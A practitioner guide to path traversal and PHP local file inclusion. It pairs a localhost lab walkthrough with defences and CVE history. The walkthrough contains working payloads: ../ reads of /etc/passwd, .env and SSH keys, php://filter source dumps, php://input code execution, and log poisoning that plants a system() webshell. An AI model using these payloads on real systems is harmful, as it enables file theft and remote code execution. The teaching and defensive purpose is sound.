Path Traversal and LFI: 2026 Practitioner Guide

Path traversal is the second-oldest serious web vulnerability after SQL injection, catalogued as CWE-22 and parked inside the A01 Broken Access Control bucket of the OWASP Top 10. The basic shape, sticking ../ into a ?file= parameter to read /etc/passwd, looks dated enough that every junior pentester learns it on day one and assumes the class is solved. It is not. In PHP land, traversal is the front door to a chain that reads source, then writes source, then runs code, all from a single GET parameter and a forgiving php.ini.

I find path traversal in more engagements than I would expect to in 2026. Every time I think the class is solved, the next code review turns up another include($_GET['page']) sitting in a corner of the codebase where a junior was told to be careful.

This article is the deep-dive companion to the web application security vulnerabilities taxonomy and a sibling to the SQL injection spoke. I cover the mechanism, the four exploit shapes that actually matter in 2026, a fully working walkthrough against a Dockerised lab, the variants in non-PHP stacks, and the defences that hold up. Tool-level material lives in best LFI tools 2026.

What is path traversal?

Path traversal is a vulnerability in which user-supplied input is concatenated into a filesystem path that the application then opens, allowing the user to step outside the intended directory using relative-path segments like ../ and read files the developer never meant to expose. The most common payload, ../../../../etc/passwd, escapes a docroot or templates directory and lands on the Unix password file.

Three terms get used interchangeably and they are not the same:

Path traversal (CWE-22). The generic class. Any time user input controls a filesystem path and ../ can escape the intended root.
Local File Inclusion (LFI). A PHP-flavoured subclass where the path is passed to include, require, include_once, or require_once. The file is not just read, it is interpreted as PHP. If the attacker can get PHP source onto the box (log poisoning, upload, wrapper), LFI turns into code execution.
Remote File Inclusion (RFI). The same sink, but the include path is a URL. Effectively extinct in modern PHP because allow_url_include defaults to Off, but it lives on in legacy configs and in CTF challenges.

OWASP places traversal under A01 Broken Access Control rather than as its own item, which understates how often I find it during code review. That placement comes from the OWASP Top 10 2021 listing; check the current edition yourself before citing it.

The canonical vulnerable PHP, two lines:

php

$page = $_GET['page'];
include($page);

Hit it with ?page=pages/about.php and the application works as intended. Hit it with ?page=../../../../etc/passwd and the application reads /etc/passwd. There is no third interpretation; the parser is doing exactly what was written.

The four exploit shapes

Every traversal exploit I have shipped against a real engagement falls into one of four shapes. Three of them are PHP-specific and chain to RCE. The fourth is the cross-stack baseline.

Classic `../` traversal

The original shape. The application reads the file and serves the bytes. Useful for reading config, credentials, source (if the file is served raw rather than interpreted), application metadata, and SSH keys if you are lucky and the web user has access.

code

GET /download?file=../../../../etc/passwd
GET /view?template=../../../../var/www/app/.env
GET /image?path=../../../../home/deploy/.ssh/id_rsa

The number of ../ segments is "as many as needed". A request that goes too high just lands at / and the filesystem ignores the surplus, so ../../../../../../../../etc/passwd works as well as the exact count. Lazy traversal payloads always over-shoot for that reason.
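The over-shoot behaviour is easy to confirm with any path normaliser. A minimal sketch using Node's path.posix module; the base directory is a made-up example, not taken from any real target:

```javascript
const path = require('node:path');

// Hypothetical directory the application intended to confine reads to.
const base = '/var/www/app/templates';

// Resolve a user-supplied relative path against the base, which is what a
// naive file-serving handler effectively does.
function naiveResolve(userInput) {
  return path.posix.resolve(base, userInput);
}

// Exactly enough ../ segments to reach the root (the base is four levels deep).
const exact = naiveResolve('../../../../etc/passwd');

// Twice as many: the surplus segments are absorbed at the root.
const overshoot = naiveResolve('../../../../../../../../etc/passwd');

console.log(exact);     // /etc/passwd
console.log(overshoot); // /etc/passwd
```

Both payloads resolve to the same file, which is why an attacker never needs to know how deep the application directory sits.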

`php://filter` source disclosure

PHP ships a set of stream wrappers for include and the filesystem functions, and the php://filter wrapper accepts a chain of filters applied to the underlying file before it is read. The interesting filter is convert.base64-encode:

code

GET /view.php?page=php://filter/convert.base64-encode/resource=index

include() is handed a stream that base64-encodes index.php as it is read (the sink in this example appends the .php suffix). The encoded bytes contain no <?php opening tag, so the engine never enters PHP mode and echoes them as literal output, and the response contains a base64 blob. Decode it locally and you have the verbatim source. Repeat against every script you can guess (view, login, db, config, wp-config) and you walk away with the application source plus every credential hard-coded in it.

This shape works against sinks that the classic shape cannot defeat. The most common one is include($_GET['page'] . '.php'), where the appended .php blocks a literal /etc/passwd read but is happily consumed by the wrapper as part of the resource= argument.

`php://input` RCE

The php://input wrapper exposes the raw request body as a stream, so include('php://input') reads the POST body and parses it as PHP. PHP only permits this when allow_url_include=On is set in php.ini; with that setting, an unauthenticated attacker gets code execution from one GET parameter plus one POST body.

code

POST /view-raw.php?page=php://input
Body: <?php system($_GET[0]); ?>

The default value of allow_url_include is Off, and PHP has shipped that default since 5.2 (see the PHP runtime configuration reference). Production servers that have not been hand-tampered with are safe from this specific shape by default. The shape still appears in the wild because operators flip the setting on while debugging a legitimate use case, never flip it back, and leave the server in that state for years.

Log poisoning

Log poisoning is the fallback when allow_url_include is Off, php://input does not work, and you still want RCE. The idea is to write PHP source onto disk via a path the attacker controls, then include that file with a classic traversal.

The two reliable write surfaces are the web server's access log and its error log. With the common combined log format, the Apache or nginx access log records the User-Agent header as sent. Send a request with a PHP tag as the user agent:

code

curl -A '<?php system($_GET[0]); ?>' http://target/

The access log now contains a real <?php block. Read it back with a traversal:

code

GET /view-raw.php?page=../../../../var/log/apache2/access.log&0=id

include() reaches the PHP tag inside the log file, parses it, and runs the system($_GET[0]) call with the attacker's chosen command. Variants of the same trick work against /var/log/apache2/error.log (poisoned via a 404 request whose URL contains PHP), /proc/self/environ on older kernels, the $HOME/.ssh/authorized_keys file when the web user happens to be the SSH user, and any session file the application writes to a known directory.

Log poisoning fails by default on modern Debian and Ubuntu because Apache writes access logs as 0640 root:adm and the www-data user is not in the adm group. Every "let the deploy user tail the logs from the debug dashboard" change to that ACL re-opens the chain. I have seen this exact misconfiguration in three different production environments in 2024 alone.
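The permission argument can be made concrete with a toy model of the Unix read check. This is a sketch in JavaScript under simplifying assumptions: it ignores ACLs, capabilities, and directory permissions, and the user and file records are illustrative rather than read from a real system.

```javascript
// Toy model of the Unix read-permission check for a single file.
function canRead(file, user) {
  if (user.name === 'root') return true; // root bypasses the mode bits
  if (user.name === file.owner) return (file.mode & 0o400) !== 0;
  if (user.groups.includes(file.group)) return (file.mode & 0o040) !== 0;
  return (file.mode & 0o004) !== 0;
}

// The access log as described above: mode 0640, owner root, group adm.
const accessLog = { owner: 'root', group: 'adm', mode: 0o640 };

// Stock web user versus the same user after a "let it tail the logs" change.
const stock = { name: 'www-data', groups: ['www-data'] };
const afterDebugChange = { name: 'www-data', groups: ['www-data', 'adm'] };

console.log(canRead(accessLog, stock));            // false
console.log(canRead(accessLog, afterDebugChange)); // true
```

One group membership is the entire difference between a failed include and a working RCE chain.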

Why null bytes don't work anymore

Pre-2010 LFI tutorials lean heavily on the null-byte truncation trick: append %00 to the payload so that the C-level filename string ends at the null byte and the appended .php suffix is never seen, turning include($_GET['page'] . '.php') into a working classic traversal. That trick was killed by PHP 5.3.4, released on December 9, 2010, which added null-byte rejection in the core filename APIs (further extensions to the check across exec, system, move_uploaded_file, and related functions landed across the 5.6.x series in 2015). Any path containing a \0 byte now raises an error rather than being silently truncated.

Verify against the PHP 5.3.4 changelog yourself before relying on the date in your own writing.

The wrapper shapes in this article matter because the wrappers became the modern equivalent of the null byte. php://filter defeats the same suffix-append sink that %00 used to defeat, and it has no equivalent fix in the language because the wrapper is a legitimate feature.

Walk a working chain (lab)

For everything below, I am attacking the lfi-basic target from the techearl-labs companion repo. It is a small PHP 8.2 app with two intentionally-vulnerable include sinks side by side, deliberately configured with allow_url_include=On and display_errors=On. Boot it with:

bash

docker compose up lfi-basic

The lab listens on http://localhost:8084. The two endpoints differ in one detail that drives every exploit decision below:

Endpoint	Sink shape
`/view.php?page=pages/about`	`include($_GET['page'] . '.php')`, `.php` is appended
`/view-raw.php?page=pages/about.php`	`include($_GET['page'])`, raw, no suffix
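The difference between the two sinks reduces to one string concatenation. The sketch below models, in JavaScript, the string each endpoint would hand to include() for three payloads; it only mirrors the sink shapes in the table and does not talk to the lab.

```javascript
// Model of the string each lab endpoint passes to include().
const sinks = {
  'view.php': (page) => page + '.php', // suffix sink
  'view-raw.php': (page) => page,      // raw sink
};

const payloads = [
  '../../../../etc/passwd',
  'php://filter/convert.base64-encode/resource=pages/about',
  'php://input',
];

// Print what include() would receive for every endpoint/payload pair.
for (const [endpoint, sink] of Object.entries(sinks)) {
  for (const payload of payloads) {
    console.log(`${endpoint} -> include("${sink(payload)}")`);
  }
}
```

The suffix turns the passwd read into a lookup for a file that does not exist and turns php://input into a name the wrapper does not recognise, but the php://filter payload still ends in a valid resource path.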

1. Classic traversal against the raw sink

view-raw.php passes the parameter straight through. Plain ../ works:

bash

curl 'http://localhost:8084/view-raw.php?page=../../../../etc/passwd'

The response renders /etc/passwd inline inside the page panel. Files with no <?php opening tag are echoed by include(), which is why the password file comes back as plain text rather than being parsed.

The same payload against /view.php fails. The engine looks for /etc/passwd.php, finds nothing, and the warning surfaces in the response (because display_errors=On). The suffix is doing its only useful job.

2. `php://filter` source disclosure against the suffix sink

view.php appends .php, so the wrapper has to compose with the suffix:

bash

curl 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'

The wrapper opens pages/about.php (the appended .php rides along inside the resource= argument), pipes it through the base64 encoder, and the include echoes the encoded source. Pipe through base64 -d to recover the original:

bash

curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Repeat for resource=view, resource=view-raw, resource=shared/layout to pull every PHP source file the application ships. Source disclosure is the highest-value LFI outcome short of code execution because it hands you every other endpoint's sink shape and every hard-coded credential in one pass.
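When the encoded source arrives wrapped in page markup, the same extract-and-decode step can be scripted. A minimal sketch in Node, assuming the encoded file is the longest base64-looking run in the response; the response body here is fabricated for the example.

```javascript
// Pull the longest base64-looking run out of a response body and decode it.
function extractSource(responseBody) {
  const runs = responseBody.match(/[A-Za-z0-9+\/=]{40,}/g) || [];
  if (runs.length === 0) return null;
  const longest = runs.reduce((a, b) => (b.length > a.length ? b : a));
  return Buffer.from(longest, 'base64').toString('utf8');
}

// Fabricated response: a page template wrapped around an encoded PHP file.
const php = '<?php $title = "About"; echo "<h1>$title</h1>"; ?>\n';
const body =
  '<html><div class="panel">' +
  Buffer.from(php, 'utf8').toString('base64') +
  '</div></html>';

console.log(extractSource(body));
```

The 40-character floor is the same heuristic as the grep above: short runs of alphanumerics in the surrounding markup are ignored.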

3. `php://input` RCE against the raw sink

The wrapper only matches the literal path php://input, so the attack runs against view-raw.php (no suffix). Against view.php, the appended .php produces php://input.php, which the wrapper does not recognise.

bash

curl -X POST --data '<?php echo shell_exec("id"); ?>' \
  'http://localhost:8084/view-raw.php?page=php://input'

The response carries the output of id, something like uid=33(www-data) gid=33(www-data) .... Any PHP runs, not just shell_exec: file writes, reverse shells, persistent webshells dropped into the docroot, database egress, anything the www-data process can do inside the container.

4. Log poisoning against the raw sink

The chain has two steps. Inject a PHP tag into the access log via the User-Agent of any request:

bash

curl -A '<?php system($_GET[0]); ?>' http://localhost:8084/

Include the log via traversal, passing the command in ?0=:

bash

curl 'http://localhost:8084/view-raw.php?page=../../../../var/log/apache2/access.log&0=id'

The log contains thousands of bytes of unrelated request lines, but the moment the parser sees <?php system($_GET[0]); ?> it switches into PHP mode, runs the call, switches back to literal-output mode, and the response carries the command output along with the rest of the log.
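The mode switching can be pictured with a toy splitter. This JavaScript sketch is not the PHP lexer (it ignores short tags and unterminated tags); it only labels which parts of a file would be echoed and which would be handed to the interpreter. The log excerpt is fabricated.

```javascript
// Toy model of include(): text outside <?php ... ?> is literal output,
// text inside is code.
function splitModes(fileContents) {
  const segments = [];
  const tag = /<\?php([\s\S]*?)\?>/g;
  let last = 0;
  let m;
  while ((m = tag.exec(fileContents)) !== null) {
    if (m.index > last) {
      segments.push({ mode: 'literal', text: fileContents.slice(last, m.index) });
    }
    segments.push({ mode: 'php', text: m[1].trim() });
    last = tag.lastIndex;
  }
  if (last < fileContents.length) {
    segments.push({ mode: 'literal', text: fileContents.slice(last) });
  }
  return segments;
}

// Fabricated access-log excerpt; the second line carries the poisoned User-Agent.
const log =
  '203.0.113.5 - - [01/Jan/2026:00:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/8.5.0"\n' +
  '203.0.113.5 - - [01/Jan/2026:00:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET[0]); ?>"\n';

const segments = splitModes(log);
for (const s of segments) console.log(s.mode, JSON.stringify(s.text));
```

Everything before and after the tag is ordinary log text; only the middle segment is code, and that is the part the attacker wrote.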

The lab's Dockerfile deliberately adds www-data to the adm group so the 0640 root:adm access log is readable by PHP. Without that change the chain fails with permission-denied; with it, it succeeds. The misconfiguration mirrors what real "let the web app tail its own logs" deployments do.

Beyond PHP: traversal in other stacks

The PHP-specific shapes (php://filter, php://input, log-poisoning-via-include) do not port directly to other stacks, because they depend on PHP's stream wrappers and on include() executing whatever file it is handed. The classic traversal shape does port. Every framework that constructs a path from user input is potentially vulnerable.

Node.js

The footgun is path.join and friends. path.join happily resolves .. segments and lets you escape the base directory:

javascript

app.get('/files/:name', (req, res) => {
  const file = path.join('/var/www/uploads', req.params.name);
  res.sendFile(file);
});

GET /files/..%2F..%2F..%2Fetc%2Fpasswd resolves to /etc/passwd. The fix is path.resolve plus a prefix check, not path.join:

javascript

const base = path.resolve('/var/www/uploads');
const target = path.resolve(base, req.params.name);
if (!target.startsWith(base + path.sep)) return res.sendStatus(403);
res.sendFile(target);

Express's static middleware blocks .. segments by default, but custom send handlers and any direct fs.readFile call with user input are at risk.
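For custom handlers, the resolve-and-check step is easiest to audit when it lives in one pure function. A sketch under stated assumptions: the upload root is hypothetical, the helper name resolveInside is mine, and the check is purely lexical (it does not follow symlinks).

```javascript
const path = require('node:path');

// Hypothetical upload root; substitute the real directory.
const BASE = path.posix.resolve('/var/www/uploads');

// Returns the absolute path if it stays inside BASE, otherwise null.
function resolveInside(name) {
  if (typeof name !== 'string' || name.includes('\0')) return null;
  const target = path.posix.resolve(BASE, name);
  return target.startsWith(BASE + '/') ? target : null;
}

// Express decodes %2F in route params, so the handler sees literal slashes.
const decoded = decodeURIComponent('..%2F..%2F..%2Fetc%2Fpasswd');

console.log(resolveInside('report.pdf'));  // /var/www/uploads/report.pdf
console.log(resolveInside(decoded));       // null
console.log(resolveInside('/etc/passwd')); // null (absolute input replaces the base)
console.log(resolveInside('a/../b.txt'));  // /var/www/uploads/b.txt
```

A handler would call the helper first and return 403 on null before passing the result to res.sendFile.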

Java

The classic Java instance is the "zip slip" vulnerability disclosed by Snyk in 2018, where archive entries with ../ in the name escape the extraction directory:

java

File target = new File(destDir, entry.getName());
new FileOutputStream(target).write(...);

A malicious archive entry named ../../../../etc/cron.d/pwn lands wherever the running user has write access. Fix:

java

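// Canonicalise the base too, so both sides of the comparison are in the same form.
File base = destDir.getCanonicalFile();
File target = new File(base, entry.getName()).getCanonicalFile();
if (!target.toPath().startsWith(base.toPath())) {
  throw new IOException("zip slip: " + entry.getName());
}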

getCanonicalFile() resolves .. segments and symlinks before the prefix check; getAbsoluteFile() does not, which is why the lazy fix loses.
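The gap between string-level and canonical resolution shows up as soon as a symlink is involved. The sketch below reproduces it in Node rather than Java, to stay in one language with the other examples: path.resolve stands in for a purely lexical normaliser and fs.realpathSync for canonicalisation. It builds a throwaway directory layout and assumes a POSIX system where the process may create symlinks.

```javascript
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Throwaway layout: <tmp>/dest is the extraction root, <tmp>/secret sits
// outside it, and dest/link is a symlink pointing at secret.
const tmp = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), 'slip-')));
const dest = path.join(tmp, 'dest');
const secret = path.join(tmp, 'secret');
fs.mkdirSync(dest);
fs.mkdirSync(secret);
fs.writeFileSync(path.join(secret, 'key.txt'), 'outside');
fs.symlinkSync(secret, path.join(dest, 'link'));

const inside = (p) => p.startsWith(dest + path.sep);

// Lexical resolution only rewrites the string; the symlink is invisible to it.
const lexical = path.resolve(dest, 'link/key.txt');

// Canonical resolution follows the symlink and reveals the real location.
const canonical = fs.realpathSync(lexical);

const lexicalPasses = inside(lexical);     // true: check passes, file is outside
const canonicalPasses = inside(canonical); // false: escape detected
console.log(lexicalPasses, canonicalPasses);

fs.rmSync(tmp, { recursive: true, force: true });
```

The prefix check is only as trustworthy as the normalisation that precedes it.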

.NET

Path.Combine is the rough equivalent of Node's path.join: it does nothing to stop .. segments from escaping the base, and it has an additional trap. If the second argument is an absolute path, Path.Combine discards the first argument entirely and returns the second. Path.Combine("/var/www/uploads", "/etc/passwd") returns /etc/passwd. The defence is Path.GetFullPath plus a prefix check, identical in shape to the Node.js pattern. Modern guidance on Microsoft Learn pushes Path.GetFullPath with an explicit base path; that call resolves the input to a normalised absolute path but does not confine it, so the prefix check is still required.
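The "absolute argument wins" behaviour is not unique to .NET. As an illustration in Node rather than C#, path.resolve behaves the same way while path.join does not; the paths are examples only.

```javascript
const path = require('node:path');

const base = '/var/www/uploads';
const input = '/etc/passwd'; // attacker supplies an absolute path

// join treats the second argument as relative text and keeps the base.
const joined = path.posix.join(base, input);

// resolve lets a later absolute argument replace everything before it,
// the same behaviour the text describes for Path.Combine.
const resolved = path.posix.resolve(base, input);

console.log(joined);   // /var/www/uploads/etc/passwd
console.log(resolved); // /etc/passwd
```

Whichever combiner a stack offers, the result has to be checked against the base afterwards; the combining function is not a validator.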

The class is the same across every stack. The interpreter changes, the syntax changes, the trust failure does not.

Modern defences

Resolve and prefix-check

The single most important defence is to resolve the requested path to its canonical form and then check it is inside the allowed directory. In PHP that is realpath:

php

$base = realpath(__DIR__ . '/pages');
$target = realpath($base . '/' . $_GET['page']);
if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
  http_response_code(403);
  exit('Forbidden');
}
include($target);

realpath returns false for paths that do not exist, which closes the "file does not exist yet but the parent directory check passed" race window. The str_starts_with prefix check with the trailing separator stops the /srv/pages-evil/ versus /srv/pages/ confusion, where the legitimate base is a prefix of an attacker-controlled sibling directory.
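The sibling-directory confusion is a one-character bug and easy to demonstrate. A short JavaScript sketch with hypothetical, already-resolved paths:

```javascript
const base = '/srv/pages';

// Hypothetical resolved paths, as a realpath-style call would return them.
const legit = '/srv/pages/about.php';
const sibling = '/srv/pages-evil/shell.php';

// Bare prefix check: the sibling directory slips through.
const bareCheck = sibling.startsWith(base);

// Prefix check with a trailing separator: only real children pass.
const strictCheckSibling = sibling.startsWith(base + '/');
const strictCheckLegit = legit.startsWith(base + '/');

console.log(bareCheck);          // true (wrong)
console.log(strictCheckSibling); // false
console.log(strictCheckLegit);   // true
```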

Allow-list of known IDs

Better: do not let user input become a path at all. Map an opaque ID to a known file:

php

$pages = [
  'about' => '/srv/app/pages/about.php',
  'contact' => '/srv/app/pages/contact.php',
];
$key = $_GET['page'] ?? 'about';
if (!isset($pages[$key])) { http_response_code(404); exit; }
include($pages[$key]);

This is the only design that is correct by construction. The user controls a key into a map, not a filesystem path. Adding a page is one line in the array, which is cheap enough that I reach for this pattern by default.
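The same pattern carries over to other stacks unchanged. A sketch in JavaScript, with a hypothetical registry and helper name; a Map is used here rather than a plain object so that inherited property names are never mistaken for valid keys.

```javascript
// Hypothetical page registry; keys are the only values a user can select.
const PAGES = new Map([
  ['about', '/srv/app/pages/about.php'],
  ['contact', '/srv/app/pages/contact.php'],
]);

// Returns the mapped file for a known key, or null for anything else.
// A missing key falls back to the default page, as in the PHP version.
function pageFor(key = 'about') {
  return typeof key === 'string' && PAGES.has(key) ? PAGES.get(key) : null;
}

console.log(pageFor('contact'));                // /srv/app/pages/contact.php
console.log(pageFor('../../../../etc/passwd')); // null
console.log(pageFor('constructor'));            // null
console.log(pageFor(undefined));                // /srv/app/pages/about.php
```

No normalisation or prefix check is needed because user input is only ever compared against known keys and never concatenated into a path.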

Disable dangerous PHP directives

ini

allow_url_include = Off
allow_url_fopen = Off
open_basedir = /srv/app:/tmp
display_errors = Off
log_errors = On

allow_url_include=Off kills the php://input RCE chain outright. allow_url_fopen=Off removes the network-fetch shapes. open_basedir confines filesystem access to an allow-listed set of directories, blocking the traversal even if the application sink is broken. None of these defences cover php://filter against the local docroot, which is why they are layered with the prefix check, not a replacement for it.

Separate file-serving service

For applications that genuinely serve user-uploaded files, the strongest pattern is a separate microservice (or a CDN with signed URLs) that holds nothing but the upload bucket and serves files by content-addressed identifier. The application hands the user a signed URL pointing at the service; the service has no relationship to the application's filesystem and no traversal sink. This is how every mature SaaS handles user uploads at scale.
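One way to picture the signed-URL handoff is an HMAC over the file identifier and an expiry time. The sketch below is an assumption-laden illustration, not a description of any particular CDN: the /f/ route, the e and s query parameters, the secret, and the function names are all hypothetical.

```javascript
const crypto = require('node:crypto');

// Hypothetical shared secret; a real deployment would load it from a secret store.
const SECRET = 'replace-me';

// HMAC over the identifier and expiry, hex-encoded.
function sign(fileId, expires) {
  return crypto
    .createHmac('sha256', SECRET)
    .update(`${fileId}:${expires}`)
    .digest('hex');
}

// Application side: mint a short-lived URL for an opaque file identifier.
function mintUrl(fileId, ttlSeconds, nowMs = Date.now()) {
  const expires = Math.floor(nowMs / 1000) + ttlSeconds;
  return `/f/${fileId}?e=${expires}&s=${sign(fileId, expires)}`;
}

// File-service side: the identifier must look like a SHA-256 hex digest,
// so nothing path-shaped ever reaches the storage lookup.
function verify(fileId, expires, sig, nowMs = Date.now()) {
  const hex64 = /^[a-f0-9]{64}$/;
  if (!hex64.test(fileId) || !hex64.test(sig)) return false;
  if (!Number.isInteger(expires) || expires * 1000 < nowMs) return false;
  const expected = Buffer.from(sign(fileId, expires), 'hex');
  return crypto.timingSafeEqual(expected, Buffer.from(sig, 'hex'));
}

const id = crypto.createHash('sha256').update('example file bytes').digest('hex');
const url = new URL(mintUrl(id, 300), 'http://files.invalid');
const e = Number(url.searchParams.get('e'));
const s = url.searchParams.get('s');

console.log(verify(id, e, s));                 // valid link
console.log(verify('../../etc/passwd', e, s)); // rejected: not a content hash
```

The service never builds a path from request input; it validates the shape of the identifier and the signature, then looks the object up by hash.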

Chroot and container isolation

Running the web process inside a chroot or a container with a minimal filesystem means a successful traversal lands the attacker inside a sandbox with nothing valuable in it. A read of /etc/passwd returns the container's stub /etc/passwd, not the host's. Combine with read-only root, no shell binaries, and dropped capabilities (CAP_DAC_READ_SEARCH in particular) and even a chained RCE has very little to do.

Real-world incidents (CVE section)

Path traversal hits well-maintained software regularly. A representative sample, all verified against the public CVE record:

CVE-2021-41773, Apache HTTP Server 2.4.49. Path traversal in URL handling, allowing requests to reach files outside the document root when those directories were not protected by Require all denied, and reaching RCE where CGI scripts were enabled. Disclosed and patched in October 2021. The fix in 2.4.50 was incomplete, leading to CVE-2021-42013 days later.
CVE-2021-42013, Apache HTTP Server 2.4.49 and 2.4.50. The follow-up to 41773, exploitable via double-encoding of the traversal sequence. The Apache Software Foundation rated it Critical for the RCE variant.
CVE-2024-23897, Jenkins. Arbitrary file read via the built-in CLI command parser, which expanded @filename arguments. Disclosed January 2024. Without Overall/Read permission, attackers could read the first three lines of any file readable by the Jenkins controller; with Overall/Read, the full file contents. Real exploitation chained the file-read into SSH key disclosure and lateral movement.
CVE-2023-2825, GitLab CE/EE. Path traversal in the file upload handler, allowing an unauthenticated user to read arbitrary files from the GitLab server when an attachment was in a public project nested deep enough. Disclosed May 2023 (NVD published 2023-05-26), affecting GitLab CE/EE 16.0.0 only; GitLab released 16.0.1 shortly after.
CVE-2019-19781, Citrix ADC and Gateway. Path traversal in the Citrix VPN appliance reaching a Perl template that the attacker could write to, chaining traversal into unauthenticated RCE. The December 2019 disclosure shipped with mitigation steps but no patch; fixes only arrived in January 2020, by which point the bug was being mass-exploited.

Every one of these landed in software with security teams, code review, and bug-bounty programs. Path traversal is not a museum piece.

Does realpath() fully prevent path traversal?

By itself, no. realpath() resolves .. segments and symlinks but it does not enforce that the resolved path is inside the directory you intended. The defence is realpath() plus an explicit prefix check (str_starts_with with a trailing separator) against the resolved base directory. The prefix check is the part that actually stops the escape; realpath() is what makes the check meaningful by normalising the path first.

Why does PHP still ship php://input?

Because it is a legitimate stream API used by frameworks to read raw POST bodies, especially for JSON and XML payloads, where you do not want PHP's form-parser to consume the body before your application sees it. The dangerous combination is php://input used as the target of include(), which only happens when an application is already vulnerable to path traversal and the operator has flipped allow_url_include to On. The wrapper itself is not the problem; the include sink plus the unsafe directive is.

Can I just block ../ with a regex?

No. Encoded variants (%2e%2e%2f, %252e%252e%252f, UTF-8 overlong encodings, ....// which collapses to ../ after a single normalisation pass) defeat naive blacklists. Even a correct blacklist does not catch the php://filter shape, which never contains a .. segment. Block-listing is the wrong shape of defence for this class. Resolve the path and check the resolved location.

Is open_basedir secure?

It is a useful belt-and-braces directive but it has a long history of bypasses, most through PHP extensions that do not honour it (older versions of imagick, certain bundled SQLite paths, race conditions with realpath caching). Treat open_basedir as defence in depth that raises the cost of exploitation, not as a primary defence. The primary defence is still the prefix check at the sink.

What is the difference between LFI and RFI?

Local File Inclusion includes a file already on the server's filesystem; the attack value comes from reading or executing files the developer did not intend to expose. Remote File Inclusion includes a file fetched from a URL the attacker controls, which is immediately RCE because the attacker writes the included PHP source. PHP gates RFI behind the allow_url_include directive, which has defaulted to Off since PHP 5.2. RFI is effectively dead in modern deployments; LFI is alive and well.

Does the .php suffix on the include path actually help?

Marginally. It blocks the literal classic-traversal read of files without a .php extension (so ../../../etc/passwd fails) but it does not block the php://filter wrapper, which composes with the suffix as part of its resource= argument. Worse, the suffix can give a false sense of security to the operator who added it. Do the prefix-check defence properly and the suffix becomes irrelevant.

How do I find path traversal in code review?

Grep for every filesystem sink that accepts a string: include, require, file_get_contents, fopen, readfile, SplFileObject in PHP; fs.readFile, fs.createReadStream, res.sendFile in Node; new File(), FileInputStream, Files.readAllBytes in Java. For each match, trace the path argument back to its source. If any path of execution lets user input reach the sink without a resolve-and-prefix-check, you have traversal.

Where to go next

The best LFI tools for 2026 listicle for the practical tool comparison.
The SQL injection deep dive for the sibling spoke in the same security cluster.
The web application security vulnerabilities taxonomy for the full map.

Path traversal is the cheapest serious vulnerability to introduce (two lines of PHP, one line of Node) and one of the cheaper ones to fix (one resolve plus one prefix check). The reason it survives is not that the fix is hard, it is that the sinks are scattered across the codebase and every "let the user pick a file" feature is a fresh chance to get it wrong. Treat every filesystem path that touches user input as untrusted, every time.

Ishan Karunaratne